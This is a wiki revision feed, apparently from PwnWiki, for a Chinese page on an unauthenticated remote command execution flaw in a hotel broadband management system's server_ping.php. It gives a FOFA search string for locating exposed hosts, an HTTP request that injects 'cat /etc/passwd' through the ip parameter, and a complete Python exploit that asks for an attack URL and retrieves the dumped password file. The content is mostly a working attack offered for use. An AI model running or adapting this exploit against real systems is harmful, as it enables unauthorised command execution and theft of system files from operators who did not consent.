https://pwnwiki.com/index.php?action=history&feed=atom&title=%E5%AE%89%E7%BE%8E%E6%95%B8%E5%AD%97_%E9%85%92%E5%BA%97%E5%AF%AC%E5%B8%B6%E9%81%8B%E7%87%9F%E7%B3%BB%E7%B5%B1_server_ping.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
安美數字 酒店寬帶運營系統 server ping.php 遠程命令執行漏洞 - Revision history
2026-04-16T03:39:44Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E5%AE%89%E7%BE%8E%E6%95%B8%E5%AD%97_%E9%85%92%E5%BA%97%E5%AF%AC%E5%B8%B6%E9%81%8B%E7%87%9F%E7%B3%BB%E7%B5%B1_server_ping.php_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2706&oldid=prev
Pwnwiki: Created page with "==FOFA== <pre> "酒店宽带运营" </pre> ==漏洞利用== GET傳入 $ip參數 後直接命令執行,並且文件無權限要求 請求包為: <pre> GET /manager/radius/s..."
2021-05-07T08:39:17Z
<p>Created page with "==FOFA== <pre> "酒店宽带运营" </pre> ==漏洞利用== GET傳入 $ip參數 後直接命令執行,並且文件無權限要求 請求包為: <pre> GET /manager/radius/s..."</p>
<p><b>New page</b></p><div>==FOFA==<br />
<pre><br />
"酒店宽带运营"<br />
</pre><br />
<br />
==漏洞利用==<br />
GET傳入 $ip參數 後直接命令執行,並且文件無權限要求<br />
<br />
請求包為:<br />
<pre><br />
GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../pq.txt&id=1 HTTP/1.1<br />
Host: <br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36<br />
</pre><br />
<br />
==POC==<br />
<pre><br />
#!/usr/bin/python3<br />
#-*- coding:utf-8 -*-<br />
# author : PeiQi<br />
# from : http://wiki.peiqi.tech<br />
<br />
import base64<br />
import requests<br />
import random<br />
import re<br />
import json<br />
import sys<br />
from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />
<br />
def title():<br />
print('+------------------------------------------')<br />
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br />
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br />
print('+ \033[34m公众号 : PeiQi文库 \033[0m')<br />
print('+ \033[34mVersion: 安美数字 酒店宽带运营系统 server_ping.php 远程命令执行漏洞 \033[0m')<br />
print('+ \033[36m使用格式: python3 poc.py \033[0m')<br />
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')<br />
print('+------------------------------------------')<br />
<br />
def POC_1(target_url):<br />
vuln_url = target_url + "/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../pq.txt&id=1"<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",<br />
"Content-Type": "application/x-www-form-urlencoded",<br />
}<br />
try:<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=10)<br />
print("\033[36m[o] 正在执行 cat /etc/passwd>../../pq.txt \033[0m".format(target_url))<br />
if "parent" in response.text and response.status_code == 200:<br />
vuln_url = target_url + "/pq.txt"<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",<br />
"Content-Type": "application/x-www-form-urlencoded",<br />
}<br />
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=10)<br />
if "root:" in response.text:<br />
print("\033[36m[o] 成功执行 cat /etc/passwd, 响应为:\n{} \033[0m".format(response.text))<br />
else:<br />
print("\033[31m[x] 请求失败:{} \033[0m")<br />
else:<br />
print("\033[31m[x] 请求失败 \033[0m")<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败:{} \033[0m".format(e))<br />
sys.exit(0)<br />
<br />
#<br />
if __name__ == '__main__':<br />
title()<br />
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))<br />
POC_1(target_url)<br />
</pre><br />
<br />
==參考==<br />
http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html</div>
Pwnwiki